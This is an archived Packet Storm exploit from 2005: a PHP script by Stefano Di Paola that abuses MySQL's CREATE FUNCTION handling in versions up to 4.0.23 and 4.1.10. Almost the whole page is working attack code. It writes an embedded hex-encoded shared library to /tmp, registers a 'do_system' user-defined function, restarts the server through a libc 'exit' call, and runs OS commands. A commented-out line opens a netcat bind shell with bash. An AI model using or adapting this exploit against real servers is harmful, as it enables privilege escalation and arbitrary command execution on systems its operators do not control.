Lucene search
Stefano Di PaolaPACKETSTORM:36597HistoryMar 15, 2005 - 12:00 a.m.
exp2.php.txt
2005-03-1500:00:00
Stefano Di Paola
packetstormsecurity.com
33
`<?
/*************************************
** Mysql CREATE FUNCTION func table arbitrary library injection
**
** Author: Stefano Di Paola
** Vulnerable: Mysql <= 4.0.23, 4.1.10
** Type of Vulnerability: Local/Remote Privileges Escalation - input validation
** Tested On : Mandrake 10.1 /Debian Sarge
** Vendor Status: Notified on March 2005
**
** Copyright 2005 Stefano Di Paola ([email protected])
**
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
**
*************************************
*/
// this is the MySql root password.
$pass='useyoupasswordhere';
function mysql_create_db($db,$link)
{
$query="CREATE database $db;";
return mysql_query($query, $link) ;
}
// the library in little endian hex. (from NGS's Hackproofing_MySql http://www.nextgenss.com/papers/HackproofingMySQL.pdf )
$solib="0x7f454c4601010100000000000000000003000300010000002006000034000000340a00000000000034002000040028001600150001000000000000000000000000000000940700009407000005000000001000000100000094070000941700009417000004010000080100000600000000100000020000009c0700009c1700009c170000c8000000c8000000060000000400000051e57464000000000000000000000000000000000000000006000000040000002500000028000000000000002600000000000000000000000000000000000000000000002200000027000000000000000000000000000000000000000000000000000000000000000000000000000000230000001e0000000000000000000000000000000000000000000000200000000000000000000000000000000000000021000000250000000000000000000000000000002400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c000000000000001f000000000000001d000000000000000000000000000000000000000000000000000000b4000000000000000300010000000000f001000000000000030002000000000070040000000000000300030000000000100500000000000003000400000000006005000000000000030005000000000090050000000000000300060000000000c0050000000000000300070000000000d0050000000000000300080000000000e8050000000000000300090000000000200600000000000003000a0000000000740700000000000003000b0000000000900700000000000003000c0000000000941700000000000003000d00000000009c1700000000000003000e0000000000641800000000000003000f00000000006c180000000000000300100000000000741800000000000003001100000000007818000000000000030012000000000098180000000000000300130000000000000000000000000003001400000000000000000000000000030015000000000000000000000000000300160000000000000000000000000003001700000000000000000000000000030018000000000000000000000000000300190000000000000000000000000003001a0000000000000000000000000003001b00010000009c170000000000001100f1ff610000000000000076000000120000002f000000d005000000000000120008007900000098180000000000001000f1ff35000000740700000000000012000b003b0000000000000097000000220000005e000000080700003600000012000a007200000098180000000000001000f1ff0a00000078180000000000001100f1ff850000009c180000000000001000f1ff4a00000000000000000000002000000020000000000000000000000020000000005f44594e414d4943005f474c4f42414c5f4f46465345545f5441424c455f005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c617373657300646f5f73797374656d006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000200010001000100030001000100010001000000000001000200680000001000000000000000731f6909000003008a000000100000001069690d000002009600000000000000941700000800000098170000080000002b070000021d00008c1800000621000090180000062600009418000006270000841800000721000088180000072600005589e583ec08e845000000e8e0000000e85b010000c9c300ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff00000000000000005589e553e8000000005b81c34f120000528b831c00000085c07402ffd0585bc9c39090909090909090909090909090905589e553e8000000005b81c31f1200005180bb200000000075348b931400000085d2752f8b8320ffffff8b1085d2741783c004898320ffffffffd28b8320ffffff8b1085d275e9c68320000000018b5dfcc9c383ec0c8b831cffffff50e846ffffff83c410ebbd89f68dbc27000000005589e553e8000000005b81c3af110000508b83fcffffff85c0740a8b831800000085c0750b8b5dfcc9c38db60000000083ec0c8d83fcffffff50e809ffffff83c4108b5dfcc9c3905589e583ec088b450c8338017409c745fc00000000eb1a83ec0c8b450c8b4008ff30e8fcffffff83c410c745fc000000008b45fcc9c390905589e55653e8000000005b81c32e1100008d83f0ffffff8d70fc8b40fc83f8ff740c83ee04ffd08b0683f8ff75f45b5e5dc390905589e553e8000000005b81c3fb10000050e8c6feffff595bc9c3000000000000941700007018000001000000680000000c000000d00500000d0000007407000004000000b4000000050000007004000006000000f00100000a000000a00000000b0000001000000003000000781800000200000010000000140000001100000017000000c00500001100000090050000120000003000000013000000080000001600000000000000feffff6f60050000ffffff6f01000000f0ffff6f10050000faffff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff00000000000000009c1700000000000000000000fe0500000e060000000000000000000000000000004743433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d316d646b2900004743433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d316d646b2900002e7368737472746162002e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e65685f6672616d65002e64617461002e64796e616d6963002e63746f7273002e64746f7273002e6a6372002e676f74002e627373002e636f6d6d656e74000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b0000000500000002000000b4000000b40000003c01000002000000000000000400000004000000110000000b00000002000000f0010000f001000080020000030000001c00000004000000100000001900000003000000020000007004000070040000a00000000000000000000000010000000000000021000000ffffff6f02000000100500001005000050000000020000000000000002000000020000002e000000feffff6f02000000600500006005000030000000030000000100000004000000000000003d000000090000000200000090050000900500003000000002000000000000000400000008000000460000000900000002000000c0050000c005000010000000020000000900000004000000080000004f0000000100000006000000d0050000d005000017000000000000000000000004000000000000004a0000000100000006000000e8050000e80500003000000000000000000000000400000004000000550000000100000006000000200600002006000054010000000000000000000010000000000000005b000000010000000600000074070000740700001a00000000000000000000000400000000000000610000000100000002000000900700009007000004000000000000000000000004000000000000006b0000000100000003000000941700009407000008000000000000000000000004000000000000007100000006000000030000009c1700009c070000c8000000030000000000000004000000080000007a0000000100000003000000641800006408000008000000000000000000000004000000000000008100000001000000030000006c1800006c0800000800000000000000000000000400000000000000880000000100000003000000741800007408000004000000000000000000000004000000000000008d000000010000000300000078180000780800002000000000000000000000000400000004000000920000000800000003000000981800009808000004000000000000000000000004000000000000009700000001000000000000000000000098080000fa000000000000000000000001000000000000000100000003000000000000000000000092090000a000000000000000000000000100000000000000";
$link=mysql_connect("127.0.0.1","root",$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo "Connected successfully as root\n";
echo "creating db for lib\n";
mysql_create_db('my_db',$link) or print ('cannot create my_db db, sorry!');
echo "done....\n";
echo "selecting db for lib\n";
mysql_select_db('my_db') or print ('cannot use my_db db, sorry!');
echo "done....\n";
echo "creating blob table for lib\n";
$query="CREATE TABLE blob_tab (blob_col BLOB);";
$result = mysql_query($query, $link) or print("cannot create blob table for lib\n");
echo "done....\n";
echo "inserting blob table for lib\n";
$query="INSERT into blob_tab values (CONVERT($solib,CHAR));";
$result = mysql_query($query, $link) or print("cannot insert blob for lib\n");
echo "done....\n";
echo "dumping lib in /tmp/libso.so.0...\n";
$query="SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0';";
$result = mysql_query($query, $link) or print("cannot dump lib\n");
echo " done....\n";
mysql_select_db('mysql') or die ('cannot use mysql db, sorry!');
echo "sending lib....\n";
$query="insert into func (name,dl) values ('do_system','/tmp/libso.so.0');";
$result = mysql_query($query, $link);
echo "done....\n";
echo "Creating exit function to restart server\n";
$query="create function exit returns integer soname 'libc.so.6';";
$result = mysql_query($query, $link) or print ("cannot create exit, sorry!\n");
echo "done....\n";
echo "Selecting exit function\n";
$query="select exit();";
$result = mysql_query($query, $link);
echo "done!\nWaiting for server to restart\n";
sleep(1);
$link=mysql_connect("127.0.0.1","root",$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo "Connected to MySql server again...\n";
//$cmd ='/usr/sbin/nc -l -p 8000 -e /bin/bash';
$cmd ='id >/tmp/id';
echo "Sending Command...$cmd\n";
$query="select do_system('$cmd');";
$result = mysql_query($query, $link);
echo "done!\n";
echo "Now use your fav shell and ls /tmp/id -l \n";
mysql_close($link);
?>
`